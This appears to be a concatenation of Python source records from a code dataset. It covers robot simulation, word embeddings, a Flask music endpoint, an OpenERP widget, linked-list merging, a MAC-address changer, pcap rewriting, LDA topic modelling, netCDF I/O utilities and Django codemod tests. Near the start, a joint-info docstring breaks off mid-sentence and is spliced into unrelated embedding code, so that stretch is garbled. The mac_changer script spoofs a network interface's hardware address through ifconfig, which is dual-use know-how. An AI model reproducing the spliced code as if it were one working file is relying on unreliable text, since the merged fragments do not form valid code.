contacts = self.p.getContactPoints(bodyA=self.floor, bodyB=self.robot)\n for contact in contacts:\n link_index = contact[4]\n if link_index >= 0:\n link_name = (self.p.getJointInfo(\n self.robot, link_index)[12]).decode()\n else:\n link_name = 'base'\n result.append((link_name, contact[6], contact[9]))\n\n return result\n\n ########## Joint Status and Controls ##########\n\n def showJoints(self):\n \"\"\"Display the details of joionts of the robot\"\"\"\n print('Joints:')\n for i, j in enumerate(self.joints):\n print(f'joint {i}: {j}')\n\n def getJointInfo(self, jointName):\n \"\"\"Get informations about a joint\n \n Return: list -- \n No Parameter Type Description \n [0] jointIndex int the same joint index as the input parameter \n [1] jointName string the name of the joint, as specified in the URDF (or SDF etc) file\n [2] jointType int type of the joint, this also implies the number of position and velocity variables. JOINT_REVOLUTE, JOINT_PRISMATIC, JOINT_SPHERICAL, JOINT_PLANAR, JOINT_FIXED. 
See the section on Base, Joint and Links for more details.\n [3] qIndex int the first position index in the positional state variables for this body\n [4] uIndex int the first velocity index in the velocity state variables for this body\n [5] flags int reserved\n [6] jointDamping float the joint damping value, as specified in the URDF file\n [7] jointFriction float the joint friction value, as specified in the URDF file\n [8] jointLowerLimit float Positional lower limit for slider and revolute (hinge) joints.\n [9] jointUpperLimit float Positional upper limit for slider and revolute joints. Values ignored in case upper limit dev_word_limit and dev_word_limit > 0): break;\n else:\n lines = file.readlines();\n\n ## build dictionary\n for index, line in enumerate(lines):\n result = extract_word_and_vector_from_line(line);\n this_word = result[0];\n this_vector = result[1];\n embedding_dictionary[this_word] = this_vector;\n if(index % 10000 == 0): print(\"At wordvector \" + str(index));\n\n ## return dictionary\n return embedding_dictionary;\n\nnot_found_set = set();\ndef find_word_vector(word):\n if(word == \"$PURPOSEFULL-SKIP-KEY$\"): return False;\n\n global not_found_set;\n global vector_source;\n global bool_load_into_ram;\n global embedding_dictionary;\n if bool_load_into_ram:\n if(embedding_dictionary == False):\n print(\"Loading embeddings dictionary\");\n embedding_dictionary = return_embedding_dictionary(vector_source)\n if word in embedding_dictionary:\n return embedding_dictionary[word];\n else:\n not_found_set.add(word);\n return False;\n\n else:\n with open(vector_source) as file:\n index = -1;\n for line in file:\n index += 1;\n result = extract_word_and_vector_from_line(line);\n this_word = result[0];\n this_vector = result[1];\n\n if(word == this_word):\n return this_vector;\n\n if(index > 100000):\n not_found_set.add(word);\n #print(\"could not find word \" + word);\n return False; ## giveup here for testing speed's sake\n\n\n return vector;\n\ndef calculate_cosine_similarity_between_vectors(vec_a, vec_b):\n '''\n A dot B = |A||B|cosine(theta)\n return cosine(theta)\n '''\n if(len(vec_a) != len(vec_b)):\n print(\"Length of Vector A and Vector B are not equal \\n \");\n return -1;\n cos = np.dot(vec_a, vec_b) / (np.linalg.norm(vec_a) * np.linalg.norm(vec_b))\n return cos;\n\ndef similarity_between_words(word_a, word_b):\n word_a = re.sub(r'[^a-zA-Z]', '', word_a) # remove nonalphanumberic\n word_b = re.sub(r'[^a-zA-Z]', '', word_b) # remove nonalphanumberic\n\n vector_a = find_word_vector(word_a);\n vector_b = find_word_vector(word_b);\n if(vector_a == False or vector_b == False): return False;\n return calculate_cosine_similarity_between_vectors(vector_a, vector_b);\n","sub_path":"feature_engineering/utilities/embeddings/google_embeddings_interface.py","file_name":"google_embeddings_interface.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"109479588","text":"import datetime\n\nfrom flask import request, jsonify\n\nfrom app.api.v1.song import song\nfrom app.model.res import Res\nfrom app.utils.common_utils import get_date_now, serialize\nfrom app.utils.song.download.netease_music import get_song_by_text\n\n\n@song.route('/netease/download', methods=['POST'])\ndef netease_download():\n text = request.form['text']\n\n start = datetime.datetime.now()\n\n song = get_song_by_text(text)\n\n end = datetime.datetime.now()\n\n if song is not None:\n # if song.id > 0:\n status = 200\n 
msg = '音乐获取成功'\n info = {\n 'text': text,\n 'song': serialize(song),\n 'created_time': get_date_now(),\n 'finish_time': (end - start).seconds\n }\n\n res_json = Res(status, msg, info)\n\n return jsonify(res_json.__dict__)\n\n else:\n status = 404\n msg = '未找到资源,请联系管理员'\n info = [\n {\n 'text': text,\n 'song': '',\n 'created_time': get_date_now(),\n 'finish_time': (end - start).seconds\n }\n ]\n\n res_json = Res(status, msg, info)\n\n return jsonify(res_json.__dict__)\n","sub_path":"app/api/v1/song/netease_song.py","file_name":"netease_song.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"102499730","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\t\n# Copyright (C) 2004-2009 Tiny SPRL (). All Rights Reserved\n# $Id$\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport gettext\n\nimport gtk\nfrom gtk import glade\nimport common\nimport service\nimport rpc\n\ndef field_pref_set(field, name, model, value, dependance=None, window=None):\n win_gl = glade.XML(common.terp_path('openerp.glade'), 'win_field_pref',\n gettext.textdomain())\n if dependance is None:\n dependance = []\n if window is None:\n window = service.LocalService('gui.main').window\n win = win_gl.get_widget('win_field_pref')\n win.set_transient_for(window)\n win.set_icon(common.OPENERP_ICON)\n ent = win_gl.get_widget('ent_field')\n ent.set_text(name)\n ent = win_gl.get_widget('ent_domain')\n ent.set_text(model)\n ent = win_gl.get_widget('ent_value')\n ent.set_text((value and str(value)) or '/')\n\n radio = win_gl.get_widget('radio_user_pref')\n\n vbox = win_gl.get_widget('pref_vbox')\n widgets = {}\n addwidget = False\n for (fname,fvalue,rname,rvalue) in dependance:\n if rvalue:\n addwidget = True\n widget = gtk.CheckButton(fname+' = '+str(rname))\n widgets[(fvalue,rvalue)] = widget\n vbox.pack_start(widget)\n if not len(dependance) or not addwidget:\n vbox.pack_start(gtk.Label(_('Always applicable !')))\n vbox.show_all()\n\n res = win.run()\n\n deps = False\n for nv in widgets.keys():\n if widgets[nv].get_active():\n deps = nv[0]+'='+str(nv[1])\n break\n window.present()\n win.destroy()\n if res==gtk.RESPONSE_OK:\n rpc.session.rpc_exec_auth('/object', 'execute', 'ir.values', 'set', 'default', deps, field, [(model,False)], value, True, False, False, radio.get_active(), True)\n return True\n return False\n\n\n\n","sub_path":"bin/widget/view/form_gtk/wid_common.py","file_name":"wid_common.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"383210686","text":"# merge-k-sorted-lists\n\nimport heapq\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, 
next=None):\n        self.val = val\n        self.next = next\n\n\nclass Solution:\n    def mergeKLists(self, lists):\n        root = res = ListNode(None)\n        heap = []\n\n        # Store the root node of each linked list in the heap\n        for i in range(len(lists)):\n            if lists[i]:\n                # Identical values cannot be pushed, so the list index is inserted as an extra tiebreaker argument\n                heapq.heappush(heap, (lists[i].val, i, lists[i]))\n\n        # After popping from the heap, push that node's successor back in\n        while heap:\n            node = heapq.heappop(heap)\n            idx = node[1]\n            res.next = node[2]\n\n            res = res.next\n            if res.next:\n                heapq.heappush(heap, (res.next.val, idx, res.next))\n\n        return root.next\n\n\n# PriorityQueue vs heapq\n# The two are effectively the same\n# PriorityQueue : guarantees thread safety\n# heapq : does not guarantee thread safety\n# If you are not using multiple threads, there is no real need for PriorityQueue\n","sub_path":"python-algorithm-interview/3_linear_data_structures/10_deque/27-1.py","file_name":"27-1.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"162296307","text":"#!/usr/bin/env python\n\nimport subprocess\nimport optparse\nimport re\n\ndef get_arguements():\n    parser = optparse.OptionParser()\n    parser.add_option(\"-i\", \"--interface\", dest=\"interface\", help=\"Interface whose MAC to change\")\n    parser.add_option(\"-m\", \"--mac\", dest=\"new_mac\", help=\"New MAC Address \")\n    (options, arguements) = parser.parse_args()\n    if not options.interface:\n        parser.error(\"[-] Please enter the interface. Use --help for help menu.\")\n    elif not options.new_mac:\n        parser.error(\"[-] Please enter the new mac. Use --help for help menu.\")\n    return options\n\ndef change_mac(interface,new_mac):\n    print(\"[+] Changing mac address of interface \" + interface + \" to \" + new_mac)\n    subprocess.call([\"ifconfig\", interface, \"down\"]) # more secure as the value of variable cannot be hijacked.\n    subprocess.call([\"ifconfig\", interface, \"hw\", \"ether\", new_mac])\n    subprocess.call([\"ifconfig\", interface, \"up\"])\n\ndef get_current_mac(interface):\n    ifconfig_result = subprocess.check_output([\"ifconfig\", interface])\n    mac_search_result = re.search(r\"\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w\", ifconfig_result)\n    if mac_search_result:\n        return mac_search_result.group(0)\n    # print(mac_search_result.group(0))\n    else:\n        print(\"[-] This interface does not have a mac address\")\n\noptions = get_arguements()\nmac = get_current_mac(options.interface)\nprint(\"[+] Current MAC is \"+str(mac))\nchange_mac(options.interface,options.new_mac)\nmac = get_current_mac(options.interface)\nif mac == options.new_mac:\n    print(\"[+] MAC has been successfully updated to \"+mac)\nelse:\n    print(\"[-] Failed to update MAC\")\n\n\n\n#options = get_arguements()\n# change_mac(options.interface,options.new_mac)\n# if mac_search_result == options.new_mac:\n#     print(\"[+] MAC changed successfully\")\n# else:\n#     print(\"[-] Could not change MAC\")\n#interface=raw_input(\"[+] Enter interface to change mac for > \")\n#new_mac=raw_input(\"[+] Enter new mac > \")\n# subprocess.call(\"ifconfig \"+interface+\" down\", shell=True)\n# subprocess.call(\"ifconfig \"+interface+\" hw ether \"+new_mac, shell=True)\n# subprocess.call(\"ifconfig \"+interface+\" up\", shell=True)\n\n","sub_path":"mac_changer.py","file_name":"mac_changer.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"223905562","text":"#\n# Copyright (c) 2020 Russell Smiley\n#\n# This file is part of build_harness.\n#\n# You should have received a copy of the MIT License along with build_harness.\n# If 
not, see .\n#\n# https://gitlab.com/ci-cd-devops/build_harness/-/blob/main/build_harness/_utility.py\n\"\"\"General support for build harness implementation.\"\"\"\n\nimport logging\nimport subprocess\nimport typing\n\nlog = logging.getLogger(__name__)\n\nCommandArgs = typing.List[str]\n\n\ndef run_command(\n    command: CommandArgs, **kwargs: typing.Any\n) -> subprocess.CompletedProcess:\n    \"\"\"\n    Run a system command using ``subprocess.run``.\n\n    Args:\n        command: List of command and arguments.\n        **kwargs: Optional arguments passed through to ``subprocess.run``.\n\n    Returns:\n        Subprocess results.\n    \"\"\"\n    log.debug(\"command to run, {0}\".format(str(command)))\n    log.debug(\"command arguments, {0}\".format(str(kwargs)))\n    result = subprocess.run(command, **kwargs)\n\n    return result\n","sub_path":"foodx_devops_tools/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"426530740","text":"# Rewrite destination MAC address with timestamp (in microsec)\n# Change actual timestamp to (UNIX epoch + 0.001 * frame no.) sec\n# Usage: python3 rewrite-pcaps.py smallFlows.pcap\n\nimport sys\nfrom pypacker import ppcap\nfrom pypacker.layer12 import ethernet\n\npreader = ppcap.Reader(filename=sys.argv[1])\npwriter = ppcap.Writer(filename=sys.argv[1] + \".rewritten.pcap\")\n\nfor ts_nano, buf in preader:\n    eth = ethernet.Ethernet(buf)\n    ts_micro = int(ts_nano / 1000) % 281474976710655\n    ts_micro_hex = (ts_micro).to_bytes(6, \"big\").hex()\n    eth.dst_s = ts_micro_hex\n    pwriter.write(eth.bin())\n\npwriter.close()","sub_path":"src/rewrite-pcaps.py","file_name":"rewrite-pcaps.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"19787095","text":"import pickle\nfrom gensim import corpora, models, similarities\nimport gensim\nimport math\nimport csv\nimport numpy as np\n\nfrom gensim.corpora.dictionary import Dictionary\nfrom gensim.models import LdaModel\nfrom collections import defaultdict\n\nimport pandas as pd\nimport itertools\n\nfrom tqdm import tqdm\nimport matplotlib\nimport matplotlib.pylab as plt\nimport json\nfrom wordcloud import WordCloud\n\nimport logging\n\n\ndf = pd.read_csv('syllabus_globun.csv', usecols=[0])\nclass_names = df.values.tolist()\nclass_names = list(itertools.chain.from_iterable(class_names))\n\nf = open(\"theme_words.csv\", \"r\")\nreader = csv.reader(f)\ntexts = [e for e in reader]\nf.close()\n\ndictionary = corpora.Dictionary(texts)\nprint(dictionary)\n# make corpus\ncorpus = [dictionary.doc2bow(t) for t in texts]\n\n\n# tfidf\ntfidf = gensim.models.TfidfModel(corpus)\n\n\n# make corpus_tfidf\ncorpus_tfidf = tfidf[corpus]\n\nNUM_TOPICS = 6\n\n# LDA Model\n# logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nlda_model = gensim.models.ldamodel.LdaModel(corpus=corpus_tfidf, id2word=dictionary, num_topics=NUM_TOPICS, alpha='symmetric', random_state=0)\n\n# test\nN = sum(count for doc in corpus for id, count in doc)\nprint(\"N: \",N)\n\nperplexity = np.exp2(-lda_model.log_perplexity(corpus))\nprint(\"perplexity:\", perplexity)\n\n# Run the test data through the model\ntest_corpus = [dictionary.doc2bow(text) for text in texts]\n\ntopic_results = []\n# Output the clustering results\nfor unseen_doc in test_corpus:\n    score_by_topic = [0] * NUM_TOPICS\n    for topic, score in lda_model[unseen_doc]:\n        score_by_topic[topic] = score\n    
topic_results.append(score_by_topic)\nfrom pprint import pprint\n\ndf = pd.read_csv('syllabus_globun.csv')\ndf['トピックの確率'] = topic_results\n\nnp.random.seed(0)\nFONT = \"/Library/Fonts/Arial Unicode.ttf\"\n\nncols = math.ceil(NUM_TOPICS/2)\nnrows = math.ceil(lda_model.num_topics/ncols)\nfig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(15,7))\naxs = axs.flatten()\n\ndef color_func(word, font_size, position, orientation, random_state, font_path):\n return 'black'\n\nfor i, t in enumerate(range(lda_model.num_topics)):\n\n x = dict(lda_model.show_topic(t, 30))\n im = WordCloud(\n font_path=FONT,\n background_color='white',\n color_func=color_func,\n random_state=0\n ).generate_from_frequencies(x)\n axs[i].imshow(im)\n axs[i].axis('off')\n axs[i].set_title('Topic '+str(t))\n\nplt.tight_layout()\nplt.savefig(f'visualize_{NUM_TOPICS}.png')\nplt.show()\n","sub_path":"test_reccomendation.py","file_name":"test_reccomendation.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"99332022","text":"import datetime\nfrom dictionary import Dict\nfrom logger import logger\n\nclass Cache:\n live=Dict()\n status=\"empty\"\n lastrefresh=\"\"\n # Cache Supported Variables\n logger = logger()\n cache=False\n\n def __init__(self,firebase_data=False):\n if(firebase_data==False):\n self.loadLocalCache()\n else:\n self.loadFromDict(firebase_data)\n \n def loadFromDict(self,firebase_data):\n self.live = Dict(firebase_data)\n\n def loadLocalCache(self,path=\"config/firebase_cache.json\"):\n try:\n \n self.cache = open(path,\"r\")\n data = Dict().loadJSON(path)\n self.logger.log(\"Loading Local Cache\")\n self.live = data\n # self.logger.log(\"Local Cache : \"+str(data.val()))\n self.cache.close()\n return True\n except:\n return False\n \n def storeLocalCache(self,path=\"config/firebase_cache.json\"):\n self.cache = open(path,\"w\")\n self.cache.write(self.live.toJSON())\n self.cache.close()\n self.logger.log(\"Flushing Cache to File\")\n \n def lastRefresh(self):\n self.lastrefresh = datetime.datetime.now().strftime(\"%d/%m/%y %H:%M\")\n\n def refresh(self,firebase_data):\n if(firebase_data==False):\n self.loadLocalCache()\n return\n else:\n self.live = Dict(firebase_data)\n self.lastrefresh = datetime.datetime.now().strftime(\"%d/%m/%y %H:%M\")\n self.status = \"loaded\"\n self.storeLocalCache()\n\n def update(self,path,value):\n self.live.updateValueAt(path,value)\n self.logger.log(\"Cache Updated @ - \"+path)\n \n def read(self,path):\n # print(path)\n return self.live.readValueAt(path)","sub_path":"cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"479818548","text":"# Simple reproduction of the gridded I/O API for netCDF\n# This is mostly an abstraction layer of NCF functions built to work with gridded I/O API data.\n# This module is in no way connected to the I/O API project or developers. 
Please do not contact the developers of I/O API about this or any files generated by this script.\n# Requires netCDF4 python module\n\nfrom __future__ import print_function\nfrom builtins import str\nfrom builtins import range\nfrom builtins import object\nimport numpy as np\nimport netCDF4 as ncf\nimport time\nfrom datetime import datetime, timedelta\n\nclass IOVar(ncf.Variable):\n '''\n Grid variable\n '''\n def __init__(self, ds, vname, dtype, dims, **kwargs):\n '''\n Variable Name\n Dtype : INT, REAL or DBLE\n Dimensions: ie ['TSTEP','LAY','ROW','COL']\n Keyword arguments to set attributes: long_name, units or var_desc \n '''\n ioapi_dtypes = {'INT': np.int32, 'REAL': np.float32, 'DBLE': np.float64}\n np_dtype = ioapi_dtypes[dtype] \n ncf.Variable.__init__(self, ds, vname, np_dtype, dims)\n self.long_name = vname.ljust(80)\n self.units = ''.ljust(80)\n self.var_desc = ''.ljust(80)\n for att, val in list(kwargs.items()):\n if att in ('long_name','units','var_desc'):\n setattr(self, att, val)\n\nclass IODataset(ncf.Dataset):\n '''\n General dataset\n '''\n def __init__(self, fname, mode='r'):\n ncf.Dataset.__init__(self, fname, mode, format='NETCDF3_CLASSIC')\n\n def create_variable(self, vname, dtype, dims, **kwargs):\n '''\n Create an IOAPI variable for this DS\n '''\n new_var = IOVar(self, vname, dtype, dims, **kwargs)\n self.variables[vname] = new_var\n self.sync()\n return new_var\n\n def set_dimensions(self, ftype='GRID', **kwargs):\n '''\n Set the file dimensions\n Override default dimension values with keyword arugments.\n Use None (nonetype) for Unlimited\n '''\n if ftype == 'GRID':\n dim_list = ('TSTEP','LAY','ROW','COL','VAR')\n elif ftype == 'BOUNDARY':\n # SIZE = ABS(NTHIK)*(2*NCOLS + 2*NROWS + 4*NTHIK)\n dim_list = ('SIZE','NLAYS','NVARS')\n else:\n raise ValueError('Unknown IO filetype. GRID only type currently supported.')\n for dim, val in list(kwargs.items()):\n if dim in dim_list:\n self.createDimension(dim, val)\n if 'TSTEP' not in list(kwargs.keys()):\n self.createDimension('TSTEP', None)\n self.createDimension('DATE-TIME', 2)\n self.init_tflag()\n\n def init_tflag(self):\n '''\n Have to init the TFLAG variable at the beginning so that TFLAG is firest variable \n '''\n tflag = self.create_variable('TFLAG', 'INT', ('TSTEP','VAR','DATE-TIME'),\n long_name='TFLAG',\n units='',\n var_desc='Timestep-valid flags: (1) YYYYDDD or (2) HHMMSS')\n\n def set_attributes(self, sdate, grid, **kwargs):\n '''\n Set the attributes. 
Auto set GDNAM, the grid parameters,\n NVARS, VAR-LIST, FTYPE, IOAPI_VERSION, EXEC_ID, CDATE, CTIME,\n UPNAM, FILEDESC, and HISTORY as fixed/auto-generated.\n SDATE and GDNAM are set in the arguments.\n Default and auto set:\n STIME, TSTEP, NLAYS, VGTYP, VGTOP, VGLVLS\n '''\n # Set grid-based attributes from grid desc\n for att in grid.grid_atts:\n if att == 'GDNAM':\n val = grid.GDNAM.ljust(16)\n else:\n val = getattr(grid, att)\n setattr(self, att, val)\n var_list = [var for var in self.variables if var != 'TFLAG']\n self.NVARS = len(var_list)\n setattr(self, 'VAR-LIST', ''.join([var.ljust(16) for var in var_list]))\n # Currently only gridded / type 1 is supported\n self.FTYPE = 1\n self.SDATE = int(sdate)\n self.IOAPI_VERSION = 'FAUX IO'.ljust(80)\n self.EXEC_ID = '?'.ljust(80)\n self.CDATE = self.WDATE = int(time.strftime('%Y%j'))\n self.CTIME = self.WTIME = int(time.strftime('%H%M%S'))\n self.UPNAM = 'FI'.ljust(16)\n self.FILEDESC = 'FAUX IO'.ljust(80)\n self.HISTORY = ' '\n self.STIME = 0\n self.TSTEP = 10000 # One hour per step default\n # Vertical levels. Assume 1.\n self.NLAYS = len(self.dimensions['LAY'])\n self.VGTYP = -1\n self.VGTOP = np.zeros([1], np.float32)\n self.VGLVLS = np.zeros([2], np.float32)\n # Override any attribute with a keyword arg\n for att, val in list(kwargs.items()):\n setattr(self, att, val) \n\n def calc_stride(self):\n '''\n Calculate the stride of the time step based on the TSTEP attribute\n Takes HHMMSS and returns seconds.\n '''\n tstep = '%0.6d' %self.TSTEP\n if tstep.startswith('-'):\n sign = -1\n tstep = tstep[1:]\n else:\n sign = 1\n step = int(tstep[:-4])*3600 + int(tstep[-4:-2])*60 + int(tstep[-2:])\n return sign * step\n\n def write_TFLAG(self):\n '''\n Create the TFLAG timesteps for the variables in the file\n based on defined SDATE, number of variables and variable timesteps\n '''\n arr = np.zeros([len(self.dimensions['TSTEP']), len(self.dimensions['VAR']), \n len(self.dimensions['DATE-TIME'])], np.int32)\n # Time independent data gets all 0s for each variable\n if arr.shape[0] > 1:\n stride = self.calc_stride()\n cur_time = datetime.strptime(str(self.SDATE) + '%0.6d' %int(self.STIME), '%Y%j%H%M%S')\n for tstep in range(arr.shape[0]):\n for tvar in range(arr.shape[1]):\n arr[tstep,tvar,0] = datetime.strftime(cur_time, '%Y%j') # Set date for TFLAG timestep\n arr[tstep,tvar,1] = datetime.strftime(cur_time, '%H%M%S') # Set time for TFLAG timestep\n cur_time += timedelta(seconds=stride)\n self.variables['TFLAG'][:] = arr\n self.sync()\n\nclass Grid(object):\n \"\"\"\n Reads the grid description file and loads the grid information for the specified grid named.\n \"\"\"\n def __init__(self, grid_name, grid_desc):\n self.GDNAM = grid_name\n self.load_gridinfo(grid_desc)\n self.grid_atts = ['GDTYP','GDNAM','GDTYP','P_ALP','P_BET','P_GAM','XCENT','YCENT','XORIG',\n 'YORIG','XCELL','YCELL','NCOLS','NROWS','NTHIK']\n\n def _parse_float(self, x):\n \"\"\"\n Returns a floating point with the correct number of trailing zeros based on the .Dx\n \"\"\"\n x = x.replace('D','E') \n return np.float64(x)\n\n def _split_line(self, line):\n return [cell.strip().strip(\"'\") for cell in line.strip().split('!')[0].split(',')]\n\n def load_gridinfo(self, grid_desc):\n \"\"\"\n Read in the grid description file and store the grid data as object attributes\n \"\"\"\n with open(grid_desc) as gd:\n state = 'proj'\n proj_table = dict()\n for line in gd:\n s_line = self._split_line(line)\n if state == 'proj':\n if s_line[0]:\n if s_line[0] == ' ':\n state = 'grid'\n else:\n 
proj_name = line.strip().strip(\"'\")\n                            line = next(gd)\n                            s_line = self._split_line(line)\n                            proj_table[proj_name] = {'GDTYP': int(s_line[0]),\n                              'P_ALP': self._parse_float(s_line[1]),\n                              'P_BET': self._parse_float(s_line[2]),\n                              'P_GAM': self._parse_float(s_line[3]),\n                              'XCENT': self._parse_float(s_line[4]),\n                              'YCENT': self._parse_float(s_line[5])}\n                else:\n                    if s_line[0] == self.GDNAM:\n                        line = next(gd)\n                        s_line = self._split_line(line)\n                        proj_name = s_line[0]\n                        self.XORIG, self.YORIG, self.XCELL, self.YCELL = \\\n                          [self._parse_float(x) for x in s_line[1:5]]\n                        self.NCOLS, self.NROWS, self.NTHIK = [int(x) for x in s_line[5:8]]\n                        for k, v in list(proj_table[proj_name].items()):\n                            setattr(self, k, v)\n                        break\n            # the break above only happens when the grid entry was found\n            if not hasattr(self, 'NCOLS'):\n                raise ValueError('Grid %s not found in grid description file.' % self.GDNAM)\n\n\n","sub_path":"emisqa/io/fauxio.py","file_name":"fauxio.py","file_ext":"py","file_size_in_byte":8687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"273241680","text":"import json\nimport subprocess\nimport os\nimport nose\n\ndef test_arma():\n    cleaning()\n    env = dict(os.environ)\n    env['PYTHONPATH'] = \".\"\n    s = subprocess.check_output(['cyclus', '-o', 'dummy.h5', 'test.json'], universal_newlines=True, env=env)\n    # Testing Building Reactors \n    with open('POWER.txt') as f:\n        rx_hist = f.readlines()\n    reactors, power = read_info(rx_hist)\n    assert reactors > 0\n    assert power < 0\n    # Testing building mines\n    with open('uranium.txt') as f:\n        mine_hist = f.readlines()\n    mine, uranium = read_info(mine_hist)\n    assert mine > 0\n    assert uranium < 0\n    cleaning()\n\ndef cleaning():\n    if os.path.exists('dummy.h5'):\n        os.remove('dummy.h5')\n    if os.path.exists('POWER.txt'):\n        os.remove('POWER.txt')\n    if os.path.exists('uranium.txt'):\n        os.remove('uranium.txt')\n    \ndef read_info(text):\n    diff = []\n    #check to see if facilities are deployed\n    first = float(text[0].split()[3])\n    last = float(text[-1].split()[3])\n    built = last > first\n    #check to make sure overprediction occurs\n    for line in text:\n        vals = line.split()\n        diff.append((float(vals[7])-float(vals[5]))/float(vals[7]))\n    avg = sum(diff)/len(diff)\n    return built, avg\n","sub_path":"tests/no_inst_tests.py","file_name":"no_inst_tests.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
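The HHMMSS-to-seconds conversion in calc_stride above is easy to sanity-check in isolation. Below is a minimal standalone sketch of the same arithmetic (the helper name is ours, not part of fauxio.py):

def hhmmss_to_seconds(tstep):
    # '%0.6d' pads the digits to six while keeping any leading sign,
    # e.g. 10000 -> '010000' and -3000 -> '-003000'
    text = '%0.6d' % tstep
    sign = -1 if text.startswith('-') else 1
    text = text.lstrip('-')
    return sign * (int(text[:-4]) * 3600 + int(text[-4:-2]) * 60 + int(text[-2:]))

assert hhmmss_to_seconds(10000) == 3600    # one hour per step
assert hhmmss_to_seconds(-3000) == -1800   # negative steps keep their sign

+{"seq_id":"58418521","text":"from django_codemod.visitors.django_40 import (\n    ForceTextToForceStrTransformer,\n    SmartTextToForceStrTransformer,\n    UGetTextLazyToGetTextLazyTransformer,\n    UGetTextNoopToGetTextNoopTransformer,\n    UGetTextToGetTextTransformer,\n    UNGetTextLazyToNGetTextLazyTransformer,\n    UNGetTextToNGetTextTransformer,\n    URLToRePathTransformer,\n)\n\nfrom .base import BaseVisitorTest\n\n\nclass TestForceTextToForceStrTransformer(BaseVisitorTest):\n\n    transformer = ForceTextToForceStrTransformer\n\n    def test_simple_substitution(self) -> None:\n        before = \"\"\"\n            from django.utils.encoding import force_text\n\n            result = force_text(content)\n        \"\"\"\n        after = \"\"\"\n            from django.utils.encoding import force_str\n\n            result = force_str(content)\n        \"\"\"\n        self.assertCodemod(before, after)\n\n\nclass TestSmartTextToForceStrTransformer(BaseVisitorTest):\n\n    transformer = SmartTextToForceStrTransformer\n\n    def test_simple_substitution(self) -> None:\n        \"\"\"Check simple use case.\"\"\"\n        before = \"\"\"\n            from django.utils.encoding import smart_text\n\n            result = smart_text(content)\n        \"\"\"\n        after = \"\"\"\n            from 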
django.utils.encoding import smart_str\n\n result = smart_str(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestUGetTextToGetTextTransformer(BaseVisitorTest):\n\n transformer = UGetTextToGetTextTransformer\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext\n\n result = ugettext(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext\n\n result = gettext(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n def test_import_with_alias(self) -> None:\n \"\"\"Check case with a common alias.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext as _\n\n result = _(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext as _\n\n result = _(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n def test_already_imported_substitution(self) -> None:\n \"\"\"Test case where gettext is already in the imports.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext, gettext\n\n result = ugettext(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext\n\n result = gettext(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestUGetTextLazyToGetTextLazyTransformer(BaseVisitorTest):\n\n transformer = UGetTextLazyToGetTextLazyTransformer\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext_lazy\n\n result = ugettext_lazy(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext_lazy\n\n result = gettext_lazy(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass TestUGetTextNoopToGetTextNoopTransformer(BaseVisitorTest):\n\n transformer = UGetTextNoopToGetTextNoopTransformer\n\n def test_noop(self) -> None:\n \"\"\"Test when nothing should change.\"\"\"\n before = \"\"\"\n from django import conf\n from django.utils import translation\n\n foo = gettext_noop(\"bar\")\n \"\"\"\n after = \"\"\"\n from django import conf\n from django.utils import translation\n\n foo = gettext_noop(\"bar\")\n \"\"\"\n\n self.assertCodemod(before, after)\n\n def test_simple_substitution(self) -> None:\n \"\"\"Check simple use case.\"\"\"\n before = \"\"\"\n from django.utils.translation import ugettext_noop\n\n result = ugettext_noop(content)\n \"\"\"\n after = \"\"\"\n from django.utils.translation import gettext_noop\n\n result = gettext_noop(content)\n \"\"\"\n self.assertCodemod(before, after)\n\n\nclass 